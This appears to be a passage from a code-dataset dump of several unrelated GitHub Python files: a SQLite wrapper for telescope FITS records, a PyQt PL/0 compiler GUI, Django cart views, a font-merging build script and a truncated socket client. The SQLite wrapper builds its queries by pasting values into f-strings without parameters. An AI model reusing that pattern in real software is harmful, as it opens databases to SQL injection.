self.cursor.fetchall()\n\n #\n def queryObsv(self, hash, column):\n ''':param hash: hash for Obsv to be queried\n :param column: column(s) to be fetched\n :returns: True if successful\n '''\n self.cursor.execute(\n f'SELECT {column} FROM {self.obsvTable} WHERE HASH = {hash};'\n )\n return self.cursor.fetchall()\n\n #\n def queryFits(self, hash, column):\n ''':param hash: hash for FitsFile to be queried\n :param column: column(s) to be fetched\n :returns: True if successful\n '''\n self.cursor.execute(\n f'SELECT {column} FROM {self.fitsTable} WHERE HASH = {hash};'\n )\n return self.cursor.fetchall()\n\n #\n def insertObsv(self, obsv):\n ''':param obsv: Obsv object to be inserted into database\n :returns: True if successful\n '''\n try:\n self.cursor.execute(\n f'INSERT INTO {self.obsvTable} VALUES ('\n f'\"{obsv.hash}\",'\n f'\"{obsv.date}\",'\n f'\"{obsv.tlscp}\",'\n f'\"{obsv.objct}\",'\n f'\"{obsv.path}\"'\n f');'\n )\n self.conn.commit()\n return True\n except Exception as e:\n logger.warning(f'Could not insert: {e}')\n return False\n\n\n\n # Not for stand-alone use, to be used when an Obsv is being inserted\n def insertFits(self, fitsFile):\n ''':param fitsFile: FitsFile object to be inserted into database\n :returns: True if successful\n '''\n try:\n hdrItems = ''\n for j in range(1, len(HDR_KEYS)): # 'SIMPLE' boundary cases\n hdrItems += (f',\"{fitsFile.hdr[HDR_KEYS[j]]}\"' if HDR_KEYS[j] in fitsFile.hdr else f',\"NULL\"')\n\n self.cursor.execute(\n f'INSERT INTO {self.fitsTable} VALUES ('\n f'\"{fitsFile.hash}\"'\n f',\"{fitsFile.obsvHash}\"'\n f',\"{fitsFile.path}\"' # absolute path of file\n # HEADER KEYWORDS BELOW\n # Insert integer inplace of boolean (SQLite3 specific)\n f',\"{(1 if fitsFile.hdr[\"SIMPLE\"] else 0)}\"'\n # Insert from second element of HDR_KEYS\n f'{hdrItems}'\n f');'\n )\n self.conn.commit()\n return True\n except Exception as e:\n logger.warning(f'Could not insert: {fitsFile.path}')\n logger.warning(e)\n return False\n\n def deleteObsv(self, obsv):\n '''Deletes entries for Obsv and corresponding FitsFiles from their respective tables\n :param obsv: Obsv object to be deleted\n :returns: True if successful\n '''\n try:\n self.cursor.execute(\n f'DELETE FROM {self.obsvTable} WHERE \"HASH\" = {obsv.hash}'\n )\n self.cursor.execute(\n f'DELETE FROM {self.fitsTable} WHERE \"OBSV-HASH\" = {obsv.hash}'\n )\n self.conn.commit()\n return True\n except Exception as e:\n logger.warning(f'{e}')\n return False\n\n def deleteObsvByRef(self, ref):\n '''Deletes entries for Obsv and corresponding FitsFiles from their respective tables\n :param ref: ref of Obsv to be deleted\n :returns: True if successful\n '''\n try:\n self.cursor.execute(\n f'DELETE FROM {self.obsvTable} WHERE \"HASH\" = {calc.hash(ref)}'\n )\n self.cursor.execute(\n f'DELETE FROM {self.fitsTable} WHERE \"OBSV-HASH\" = {calc.hash(ref)}'\n )\n self.conn.commit()\n return True\n except Exception as err:\n #logger.warning(f'{e}')\n exception_type = type(err).__name__\n print(exception_type)\n return False\n\n # Creates single-table for observations, with four essential columns.\n # Shall be used for creation/migration only.\n def createObsvTable(self): #returns boolean\n '''Creates table for storing Obsv object information (named as self.obsvTable value)\n :returns: True if successful\n '''\n try:\n self.cursor.execute(\n f'CREATE TABLE IF NOT EXISTS {self.obsvTable} (\\n'\n f'\"HASH\" INTEGER PRIMARY KEY\\n'\n f',\"DATE\" TEXT NOT NULL\\n' # YYYY-MM-DD, also foldername in \n f',\"TELESCOP\" TEXT NOT NULL\\n'\n f',\"OBJECT\" TEXT NOT NULL\\n'\n f',\"PATH\" TEXT NOT NULL\\n'\n f');'\n )\n self.conn.commit()\n return True\n except Exception as e:\n logger.warning(f'{e}')\n return False\n\n\n # Creates single-table for FITS-Headers\n # Shall be used at creation/migration only\n def createFitsTable(self): #returns boolean\n '''Creates table for storing FitsFile object information (named as self.fitsTable value)\n :returns: True if successful\n '''\n try:\n self.cursor.execute(\n #print( # for debugging when table not created, print the string\n f'CREATE TABLE IF NOT EXISTS {self.fitsTable} (\\n'\n f'\"HASH\" INTEGER PRIMARY KEY,\\n' # file's hash\n f'\"OBSV-HASH\" INTEGER NOT NULL,\\n' # hash for parent Obsv\n f'\"PATH\" TEXT NOT NULL,\\n' # absolute path of file\n # HEADER KEYWORDS BELOW (AUKR-REF in header for archived files)\n f'\"{HDR_KEYS[0]}\" INTEGER,\\n' #for bool\n f'\"{HDR_KEYS[1]}\" INTEGER,\\n' \n f'\"{HDR_KEYS[2]}\" INTEGER,\\n'\n f'\"{HDR_KEYS[3]}\" INTEGER,\\n'\n f'\"{HDR_KEYS[4]}\" INTEGER,\\n' \n f'\"{HDR_KEYS[5]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[6]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[7]}\" TEXT NOT NULL,\\n' #str \"DATE-OBS\"\n f'\"{HDR_KEYS[8]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[9]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[10]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[11]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[12]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[13]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[14]}\" INTEGER,\\n' \n f'\"{HDR_KEYS[15]}\" INTEGER,\\n' \n f'\"{HDR_KEYS[16]}\" INTEGER,\\n' \n f'\"{HDR_KEYS[17]}\" INTEGER,\\n' \n f'\"{HDR_KEYS[18]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[19]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[20]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[21]}\" INTEGER,\\n' \n f'\"{HDR_KEYS[22]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[23]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[24]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[25]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[26]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[27]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[28]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[29]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[30]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[31]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[32]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[33]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[34]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[35]}\" REAL,\\n' #float\n f'\"{HDR_KEYS[36]}\" TEXT,\\n' #str\n # the image #astropy.io.fits.header._HeaderCommentaryCards\n f'\"{HDR_KEYS[37]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[38]}\" TEXT NOT NULL,\\n' #str \"OBJECT\"\n f'\"{HDR_KEYS[39]}\" TEXT NOT NULL,\\n' #str \"TELESCOP\"\n f'\"{HDR_KEYS[40]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[41]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[42]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[43]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[44]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[45]}\" TEXT,\\n' #float\n f'\"{HDR_KEYS[46]}\" TEXT,\\n' #str\n f'\"{HDR_KEYS[47]}\" TEXT,\\n' #str \n f'\"{HDR_KEYS[48]}\" TEXT,\\n' #str #was null in sample\n f'\"{HDR_KEYS[49]}\" TEXT,\\n' #str #was null in sample\n f'\"{HDR_KEYS[50]}\" TEXT,\\n' #float\n f'\"{HDR_KEYS[51]}\" TEXT,\\n' #float\n f'\"{HDR_KEYS[52]}\" TEXT,\\n' #float\n f'\"{HDR_KEYS[53]}\" TEXT,\\n' #float\n f'\"{HDR_KEYS[54]}\" TEXT NOT NULL\\n' #str \"AUKR-REF\"\n # END of HEADER KEYWORDS\n f');'\n )\n self.conn.commit()\n return True\n except Exception as e:\n logger.warning(f'{e}')\n return False\n\n \n\n\n# Create database object to connect provided sqlite3.db file\narchiveDB = ObservatoryDB(args.dbfile, TABLE_OBSV, TABLE_FITS)\nif not archiveDB.createFitsTable():\n logger.info(f'Table \"{TABLE_FITS}\" could not be created')\nif not archiveDB.createObsvTable():\n logger.info(f'Table \"{TABLE_OBSV}\" could not be created')\n","repo_name":"cbugk/obsman","sub_path":"obsman/python3-code/aukr/omal/sqlitedb/sqlitedb.py","file_name":"sqlitedb.py","file_ext":"py","file_size_in_byte":11193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18369094708","text":"import sys\r\nimport traceback\r\n\r\nimport time\r\n\r\nimport re\r\nfrom PyQt5.QtCore import QThread, pyqtSignal\r\nfrom PyQt5.QtGui import QTextCursor, QColor, QTextCharFormat\r\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QFileDialog, qApp, QLabel, QMessageBox, QAction\r\n\r\nfrom CompilerUi.Highlighter import Pl0Highlighter\r\nfrom Pl0compiler import Error\r\nfrom Pl0compiler.Interpreter import Interpreter\r\nfrom Pl0compiler.Praser import Praser, SymbolTable\r\nfrom Pl0compiler.Scanner import Scanner\r\nfrom CompilerUi.about import Ui_Form\r\nfrom CompilerUi.mainWindow import Ui_MainWindow\r\nfrom CompilerUi.pcodeRun import Ui_runCodeForm\r\n\r\n\r\nclass MainWindow(QMainWindow, Ui_MainWindow):\r\n def __init__(self, parent=None):\r\n super(MainWindow, self).__init__(parent)\r\n self.runcodeForm = RunCodeForm()\r\n self.about = About()\r\n\r\n self.setupUi(self)\r\n\r\n self.tableSelectHorizontalSlider.setRange(0, 2)\r\n self.highlighter = Pl0Highlighter(self.sourceCodePlainTextEdit.document())\r\n self.filePath = None\r\n self.compileFin = False\r\n self.table = []\r\n self.pcodeList = None\r\n self.permanent = QLabel()\r\n self.permanent.setText(\"line 1 col 0\")\r\n self.statusbar.addPermanentWidget(self.permanent)\r\n self.tableSelectHorizontalSlider.setVisible(False)\r\n self.lastTag = -1\r\n\r\n def menubarTriggle(self, action):\r\n if self.actionNewFile == action:\r\n self.newFile()\r\n if self.actionOpenFile == action:\r\n self.openFile()\r\n elif self.actionSaveFile == action:\r\n self.saveFile()\r\n elif self.actionSaveAs == action:\r\n self.saveAs()\r\n elif self.actionExit == action:\r\n qApp.quit()\r\n elif self.actionAbout == action:\r\n self.about.show()\r\n elif self.actionSavePcode == action:\r\n self.savePcode()\r\n\r\n def newFile(self):\r\n self.filePath = None\r\n self.lastTag = -1\r\n self.compileFin = False\r\n self.pcodePlainTextEdit.clear()\r\n self.tableTextEdit.clear()\r\n self.setWindowTitle(\"Pl0文法编译器 untitled\")\r\n self.sourceCodePlainTextEdit.clear()\r\n self.ErrortextBrowser.clear()\r\n\r\n def openFile(self):\r\n fileName = QFileDialog.getOpenFileName(self, \"打开文件\", \"\",\r\n \"Text files(*.txt);;Pl0 files(*.pl);;Python files(*.py)\")\r\n if fileName != ('', ''):\r\n try:\r\n with open(fileName[0], 'r', encoding=\"utf-8\") as fp:\r\n src = fp.read()\r\n except:\r\n with open(fileName[0], 'r', encoding=\"gbk\") as fp:\r\n src = fp.read()\r\n\r\n finally:\r\n self.filePath = fileName[0]\r\n self.lastTag = -1\r\n self.compileFin = False\r\n self.setWindowTitle(\"Pl0文法编译器 \" + self.filePath)\r\n self.sourceCodePlainTextEdit.document().clear()\r\n self.sourceCodePlainTextEdit.setPlainText(src)\r\n self.ErrortextBrowser.clear()\r\n self.pcodePlainTextEdit.clear()\r\n self.tableTextEdit.clear()\r\n\r\n def saveFile(self):\r\n if self.filePath == None:\r\n filename = QFileDialog.getSaveFileName(self, '保存文件', \"\",\r\n \"Text files(*.txt);;Pl0 files(*.pl);;Python files(*.py)\")\r\n if filename != ('', ''):\r\n # if filename[1][0]==\"T\" and filename[0][-4:-1]!=\".txt\": #this is for linux\r\n # arg=\".txt\"\r\n # elif filename[1]==\"Pl0 files(*.pl)\" and filename[0][-3:-1]!=\".pl\":\r\n # arg=\".pl\"\r\n # elif filename[1]==\"Python files(*.py)\" and filename[0][-3:-1]!=\".py\":\r\n # arg=\".py\"\r\n # else:\r\n # arg=\"\"\r\n # self.filePath = filename[0]+arg\r\n self.filePath = filename[0]\r\n self.setWindowTitle(\"Pl0文法编译器 \" + self.filePath)\r\n else:\r\n return\r\n with open(self.filePath, 'w') as f:\r\n my_text = self.sourceCodePlainTextEdit.toPlainText()\r\n f.write(my_text)\r\n self.statusbar.showMessage(\"保存成功\")\r\n\r\n def saveAs(self):\r\n filename = QFileDialog.getSaveFileName(self, '保存文件', \"\",\r\n \"Text files(*.txt);;Pl0 files(*.pl);;Python files(*.py)\")\r\n if filename == ('', ''):\r\n return\r\n with open(filename[0], 'w') as f:\r\n my_text = self.sourceCodePlainTextEdit.toPlainText()\r\n f.write(my_text)\r\n self.statusbar.showMessage(\"保存成功\")\r\n\r\n def updateColLine(self):\r\n self.permanent.setText(\"line \" + str(self.sourceCodePlainTextEdit.textCursor().blockNumber() + 1) + \" \" + str(\r\n self.sourceCodePlainTextEdit.textCursor().columnNumber()))\r\n\r\n def savePcode(self):\r\n filename = QFileDialog.getSaveFileName(self, '保存文件', \"\",\r\n \"Text files(*.txt);;Pcode files(*.pcode);;Python files(*.py)\")\r\n if filename == ('', ''):\r\n return\r\n with open(filename[0], 'w') as f:\r\n my_text = self.pcodePlainTextEdit.toPlainText()\r\n f.write(my_text)\r\n self.statusbar.showMessage(\"保存成功\")\r\n\r\n def runPcode(self):\r\n try:\r\n if not self.compileFin:\r\n QMessageBox.warning(self, \"警告\",\r\n \"编译未完成,请先编译\")\r\n else:\r\n self.runcodeForm.setPcodeList(self.pcodeList)\r\n self.runcodeForm.runInterper()\r\n self.runcodeForm.show()\r\n except:\r\n print(traceback.format_exc())\r\n\r\n def changeTable(self, pos):\r\n self.tableTextEdit.clear()\r\n self.tableTextEdit.insertHtml(self.table[pos])\r\n\r\n def showTable(self):\r\n try:\r\n if not self.compileFin:\r\n QMessageBox.warning(self, \"警告\",\r\n \"编译未完成,请先编译\")\r\n else:\r\n self.tableTextEdit.clear()\r\n if len(self.table) > 1:\r\n self.tableSelectHorizontalSlider.setRange(0, len(self.table) - 1)\r\n self.tableSelectHorizontalSlider.setVisible(True)\r\n self.tableSelectHorizontalSlider.setValue(0)\r\n self.tableSelectHorizontalSlider.setFocus(True)\r\n self.tableTextEdit.insertHtml(self.table[0])\r\n\r\n\r\n\r\n except:\r\n print(traceback.format_exc())\r\n\r\n def showError(self, url):\r\n line = int(url.fileName()[:-1])\r\n if self.lastTag != -1:\r\n self.highlightCurrentLine(self.lastTag, 0)\r\n self.highlightCurrentLine(line, 1)\r\n self.lastTag = line\r\n\r\n def highlightCurrentLine(self, line, status):\r\n try:\r\n selection = self.sourceCodePlainTextEdit.document().findBlockByLineNumber(line)\r\n cursor = self.sourceCodePlainTextEdit.textCursor()\r\n line = selection.text() + \" \"\r\n cursor.setPosition(selection.position())\r\n cursor.movePosition(QTextCursor.EndOfLine, QTextCursor.KeepAnchor)\r\n formats = QTextCharFormat()\r\n if status:\r\n formats.setBackground(QColor('red'))\r\n cursor.removeSelectedText()\r\n cursor.insertText(line, formats)\r\n except:\r\n print(traceback.format_exc())\r\n\r\n def producePcode(self):\r\n ##\r\n self.compileFin = False\r\n self.ErrortextBrowser.clear()\r\n self.pcodePlainTextEdit.clear()\r\n self.tableTextEdit.clear()\r\n self.tableSelectHorizontalSlider.setValue(0)\r\n self.tableSelectHorizontalSlider.setVisible(False)\r\n if self.lastTag != -1:\r\n self.highlightCurrentLine(self.lastTag, 0)\r\n s = Scanner(content=WrapperQPlianText(self.sourceCodePlainTextEdit))\r\n praser = Praser(s, SymbolTable(), Interpreter())\r\n if praser.prase():\r\n self.statusbar.showMessage(\"编译成功\")\r\n self.compileFin = True\r\n self.pcodeList = praser.interperter.pcodeList\r\n text = \"\"\r\n for i in praser.interperter.pcodeList:\r\n text += i.toString() + \"\\n\"\r\n self.pcodePlainTextEdit.setPlainText(text)\r\n self.table = praser.table.tableshow\r\n else:\r\n self.statusbar.showMessage(\"编译中出现错误\")\r\n self.ErrortextBrowser.insertHtml(Error.Error.errinfo)\r\n\r\n\r\nclass WrapperQPlianText:\r\n def __init__(self, plainText):\r\n self.plainText = plainText\r\n self.pos = 0\r\n\r\n def readline(self):\r\n eof = 0\r\n textCursor = self.plainText.textCursor()\r\n textCursor.setPosition(self.pos)\r\n textCursor.movePosition(QTextCursor.Down, QTextCursor.KeepAnchor)\r\n endPos = textCursor.position()\r\n if self.pos == endPos:\r\n textCursor.movePosition(QTextCursor.EndOfLine, QTextCursor.KeepAnchor)\r\n eof = 1\r\n\r\n endPos = textCursor.position()\r\n line = textCursor.selectedText()\r\n self.pos = endPos\r\n line = line.encode(encoding='ascii', errors='ignore').decode(\"ascii\")\r\n if not eof:\r\n line += \"\\n\"\r\n elif line != \"\":\r\n line += \"\\n\"\r\n return line\r\n\r\n\r\nclass InterpreterThread(QThread, Interpreter):\r\n updateSingnal = pyqtSignal(int, str)\r\n\r\n def __init__(self):\r\n super(InterpreterThread, self).__init__()\r\n self.hasInput = False\r\n self.inputBuffer = \"\"\r\n\r\n def setPcodeList(self, pcodeList):\r\n self.pcodeList = pcodeList\r\n\r\n def readNum(self):\r\n self.updateSingnal.emit(0, \"请输入一个数字\")\r\n while not self.hasInput:\r\n time.sleep(0.3)\r\n while 1:\r\n try:\r\n a = self.inputBuffer\r\n self.hasInput = False\r\n self.inputBuffer = \"\"\r\n a = int(a)\r\n return a\r\n except:\r\n pass\r\n\r\n def errorshow(self, errormsg):\r\n self.updateSingnal.emit(1, errormsg)\r\n\r\n def printInstruct(self, msg):\r\n self.updateSingnal.emit(0, msg)\r\n\r\n def printRun(self, num, status):\r\n if status == 1:\r\n self.updateSingnal.emit(0, \"\\n\")\r\n else:\r\n self.updateSingnal.emit(0, str(num) + \" \")\r\n\r\n def run(self):\r\n self.interperter(self.pcodeList)\r\n\r\n\r\nclass RunCodeForm(QWidget, Ui_runCodeForm):\r\n def __init__(self, parent=None):\r\n super(RunCodeForm, self).__init__(parent)\r\n self.setupUi(self)\r\n self.interpre = None\r\n exitAction = QAction(self)\r\n exitAction.setShortcut('ESC')\r\n exitAction.triggered.connect(self.close)\r\n self.addAction(exitAction)\r\n\r\n def setPcodeList(self, pcodeList):\r\n self.interpre = InterpreterThread()\r\n self.interpre.setPcodeList(pcodeList)\r\n\r\n def runInterper(self):\r\n self.errorMonitortextEdit.clear()\r\n self.runMonitporTextEdit.clear()\r\n self.inputLineEdit.setFocus(True)\r\n self.interpre.updateSingnal.connect(self.updateUI)\r\n\r\n self.interpre.start()\r\n\r\n def updateUI(self, status, msg):\r\n if status == 1:\r\n self.errorMonitortextEdit.append(msg)\r\n else:\r\n self.runMonitporTextEdit.append(msg)\r\n self.runMonitporTextEdit.moveCursor(QTextCursor.StartOfLine)\r\n self.runMonitporTextEdit.textCursor().deletePreviousChar()\r\n self.runMonitporTextEdit.moveCursor(QTextCursor.EndOfLine)\r\n\r\n def sendData(self):\r\n if self.interpre.hasInput:\r\n QMessageBox.warning(self, \"警告\",\r\n \"数据已发送,请稍等后重试\")\r\n elif self.inputLineEdit.text() != \"\":\r\n self.interpre.inputBuffer = self.inputLineEdit.text()\r\n self.inputLineEdit.clear()\r\n self.interpre.hasInput = True\r\n\r\n\r\nclass About(QWidget, Ui_Form):\r\n def __init__(self, parent=None):\r\n super(About, self).__init__(parent)\r\n self.setupUi(self)\r\n\r\n def closeAbout(self):\r\n self.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n mainWindow = MainWindow()\r\n mainWindow.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"ericma15/Pl0-Compiler","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":12569,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"71818122793","text":"from django.shortcuts import render, redirect\nfrom store.models import Product\nfrom . models import CartItem, Cart\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404\nfrom store.models import Variation\nfrom django.contrib.auth.decorators import login_required\n\ndef Carts_id(request,product=None,selected_color = None, selected_size = None):\n cart_id= request.session.session_key\n print(\"cart id:\", cart_id)\n if not cart_id:\n request.session.save()\n cart_id = request.session.create()\n # print(\"Cart ID:\", cart)\n if product and selected_color and selected_size:\n try:\n cart_item = CartItem.objects.get(cart__cart_id=cart_id, product=product,size = selected_size,color = selected_color)\n print(\"cart_item\",cart_item)\n print(\"product\",product)\n return cart_item.id if cart_item else None\n except CartItem.DoesNotExist:\n return None\n return cart_id\n#his is my add cart function original code starting \ndef add_Carts(request,product_id):\n product = Product.objects.get(id = product_id)\n product_variation = []\n if request.method == \"POST\":\n for item in request.POST:\n print(\"item:\",item)\n key = item \n value =request.POST.get(item)\n print(\"value:\",value )\n\n try:\n variation = Variation.objects.get(product=product, variation_category__iexact = key,variation_value__iexact = value)\n print(\"variation:\", variation)\n product_variation.append(variation)\n print(\"product variation\",product_variation)\n except:\n pass\n\n try:\n cart = Cart.objects.get(cart_id = Carts_id(request))\n except Cart.DoesNotExist:\n cart = Cart.objects.create(\n cart_id = Carts_id(request)\n )\n cart.save()\n\n try:\n cart_item = CartItem.objects.get(product=product,cart=cart)\n print(\"Variations in cart_item:\", cart_item.variations.all())\n if len(product_variation)>0:\n cart_item.variations.clear()\n for item in product_variation:\n cart_item.variations.add(item)\n cart_item.quantity += 1\n cart_item.save()\n except CartItem.DoesNotExist:\n cart_item = CartItem.objects.create(\n product = product,\n quantity =1,\n cart = cart\n )\n if len(product_variation)>0:\n cart_item.variations.clear()\n for item in product_variation:\n cart_item.variations.add(item)\n cart_item.save()\n from django.db import connection\n print(\"SQL Query:\", str(connection.queries[-1]))\n return redirect(\"Carts\")\n\n\n \n \n \n\n \n\n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef remove_Carts(request, product_id,cart_item_id):\n product = get_object_or_404(Product,id=product_id)\n try:\n if request.user. is_authenticated:\n cart_item = CartItem.objects.get(product=product, user=request.user,id=cart_item_id)\n else:\n cart= Cart.objects.get(cart_id= Carts_id(request)) \n cart_item = CartItem.objects.get(product=product, cart=cart,id=cart_item_id)\n if cart_item and cart_item.quantity >1:\n cart_item.quantity -= 1\n cart_item.save()\n else:\n cart_item.delete()\n except CartItem.DoesNotExist:\n pass\n return redirect('Carts')\ndef remove_Cart_item(request,product_id,cart_item_id):\n product = get_object_or_404(Product,id =product_id)\n if request.user.is_authenticated:\n cart_item = CartItem.objects.get(product = product, user=request.user,id=cart_item_id)\n else:\n cart = Cart.objects.get(cart_id = Carts_id(request))\n cart_item = CartItem.objects.get(product = product, cart=cart,id=cart_item_id)\n cart_item.delete() \n return redirect('Carts')\n\n\ndef Carts(request, total = 0, quantity = 0, cart_items = None): \n try:\n tax= 0\n grand_total= 0\n if request.user.is_authenticated:\n cart_items = CartItem.objects.filter(user=request.user, is_active= True)\n else:\n cart = Cart.objects.get(cart_id= Carts_id(request))\n cart_items = CartItem.objects.filter(cart=cart, is_active= True)\n for cart_item in cart_items:\n total += (cart_item.product.price) * cart_item.quantity\n quantity += cart_item.quantity\n tax = (2 * total)/100\n grand_total = total + tax \n except Cart.DoesNotExist:\n pass\n context = {\n 'total':total,\n 'quantity':quantity,\n 'cart_items':cart_items,\n 'tax' : tax,\n 'grand_total':grand_total,\n\n }\n return render(request, 'store/cart.html', context)\n@login_required(login_url='login')\ndef checkout(request, total = 0, quantity = 0,cart_items = None):\n tax= 0\n grand_total= 0 \n try:\n if request.user.is_authenticated:\n cart_items = CartItem.objects.filter(user=request.user, is_active= True)\n else:\n cart = Cart.objects.get(cart_id= Carts_id(request))\n cart_items = CartItem.objects.filter(cart=cart, is_active= True)\n for cart_item in cart_items:\n total += (cart_item.product.price) * cart_item.quantity\n quantity += cart_item.quantity\n tax = (2 * total)/100\n grand_total = total + tax\n except Cart.DoesNotExist:\n pass\n context = {\n 'total':total,\n 'quantity':quantity,\n 'cart_items':cart_items,\n 'tax' : tax,\n 'grand_total':grand_total,\n\n }\n return render(request,'store/checkout.html',context)\n\n\n","repo_name":"meghathomas1999/Greatcart","sub_path":"carts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15768803432","text":"# -*- coding: utf-8 -*-\n\nimport fontforge\nimport datetime\nimport textwrap\nimport argparse\nimport psMat\nimport json\nimport csv\nimport os\nimport sys\n\nversion = '1.2.0'\ntoday = datetime.date.today()\n\nparser = argparse.ArgumentParser()\nparser.add_argument('ricty')\nparser.add_argument('firacode')\nparser.add_argument('out_font')\nparser.add_argument('weight')\nparser.add_argument('discord')\noptions = parser.parse_args(sys.argv[1:])\n\nif options.discord == 'true':\n fontname = 'RictyDiminishedDiscordWithFiraCode'\n familyname = 'Ricty Diminished Discord with Fira Code'\nelse:\n fontname = 'RictyDiminishedWithFiraCode'\n familyname = 'Ricty Diminished with Fira Code'\nweight = options.weight\n\nricty = fontforge.open(options.ricty)\nfiracode = fontforge.open(options.firacode)\n\n# Load ligatures data and create data to generate feature file\nwith open('ligatures.csv', 'r') as file:\n ligatures_reader = csv.reader(file, delimiter=' ')\n\n ligatures = []\n nullable_glyphs = []\n glyphs = []\n\n for [components, source_type, name] in ligatures_reader:\n glyphs.append((source_type, name))\n component_names = list(map(lambda c: ricty[ord(c)].glyphname, list(components)))\n\n nullable_glyphs.extend(component_names[:-1])\n\n ligatures.append({\n 'glyph': name,\n 'components': component_names,\n 'lookup': '_'.join(map(lambda name: name.upper(), component_names)),\n })\n\n# Unique\nnullable_glyphs = list(set(nullable_glyphs))\n\n# Dump data\nwith open('data.json', 'w') as file:\n file.write(json.dumps({\n 'ligatures': ligatures,\n 'nullable_glyphs': nullable_glyphs,\n }))\n\n# Copy needed glyphs from Fira Code font to Ricty\nfor (source_type, name) in glyphs:\n ricty.createChar(-1, name)\n\n if source_type == 'svg':\n ricty[name].importOutlines('svg/{}.{}.svg'.format(name, weight))\n ricty[name].width = 500\n elif source_type == 'glf':\n firacode.selection.select(name)\n firacode.copy()\n ricty.selection.select(name)\n ricty.paste()\n\n ricty.transform(psMat.compose(psMat.scale(500 / 1200), psMat.translate(0, 50)))\n ricty[name].width = 500\n\n# Import Powerline glyphs\npowerline_codes = [0xE0A0, 0xE0A1, 0xE0A2, 0xE0B0, 0xE0B1, 0xE0B2, 0xE0B3]\n\nfor codepoint in powerline_codes:\n ricty.createChar(codepoint)\n firacode.selection.select(('unicode',), codepoint)\n firacode.copy()\n ricty.selection.select(('unicode',), codepoint)\n ricty.paste()\n\n# Modify glyphs\n\n# Branch\nricty[0xE0A0].transform(psMat.translate(-50, 0))\n# Line Number\nricty[0xE0A1].transform(psMat.translate(-50, 0))\n# Locked\nricty[0xE0A2].transform(psMat.scale(500 / 600))\n\n# Reset widths\nfor codepoint in powerline_codes:\n ricty[codepoint].width = 500\n\n# Set font name\nricty.familyname = familyname\nricty.fontname = '{}-{}'.format(fontname, weight)\nricty.fullname = '{} {}'.format(familyname, weight)\nricty.weight = weight\n\n# Set base version of the font\nricty.version = version\n\n# Unset other version names to make them auto-calculated by FontForge\nricty.sfntRevision = None\nricty.woffMajor = None\nricty.woffMinor = None\n\nricty.copyright = textwrap.dedent('''\\\n Copyright (c) 2012-2014 Yasunori Yusa\n Copyright (c) 2006 Raph Levien\n Copyright (c) 2006-2013 itouhiro\n Copyright (c) 2002-2013 M+ FONTS PROJECT\n Copyright (c) 2014 Mozilla Foundation\n Copyright (c) 2014 Telefonica S.A.\n Copyright (c) 2014 Nikita Prokopov\n Copyright (c) 2014 The Fira Code Project Authors (https://github.com/tonsky/FiraCode)\n Copyright (c) 2016-2019 Koki Takahashi\n License:\n SIL Open Font License Version 1.1 (http://scripts.sil.org/ofl)\n''')\n\nwith open('LICENSE') as file:\n ricty.appendSFNTName('English (US)', 'License', file.read())\n\nricty.appendSFNTName('English (US)', 'License URL', 'http://scripts.sil.org/OFL')\n\nricty.appendSFNTName('English (US)', 'UniqueID', '{} {} : {} : {}'.format(familyname, weight, version, today.isoformat()))\n\n# Export\ntry:\n os.remove(options.out_font)\nexcept OSError:\n pass\nricty.generate(options.out_font)\n","repo_name":"hakatashi/RictyDiminished-with-FiraCode","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"72"} +{"seq_id":"41783158679","text":"import protocol\nimport socket\nimport socketserver\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives import hashes\n\nHOST, PORT_R, PORT_A, PORT_SER = \"localhost\", 30333, 50555, 3333\nINITIALIZE, REGISTER, ESTABLISHED= 0x00, 0x01, 0x02 \n\nclass User_server(socketserver.BaseRequestHandler):\n def handle(self):\n self.data = self.request.recv(1024).strip()\n self.request.sendall(self.data.upper())\n\n##TODO\n# with socketserver.TCPServer((ADDR, PORT_SER), user_server) as server: \n# server.serve_forever()\n\nclass User_client:\n def __initialize__(self):\n self.username=input('Please enter your nickname: ')\n print('Hello '+self.username)\n try:\n 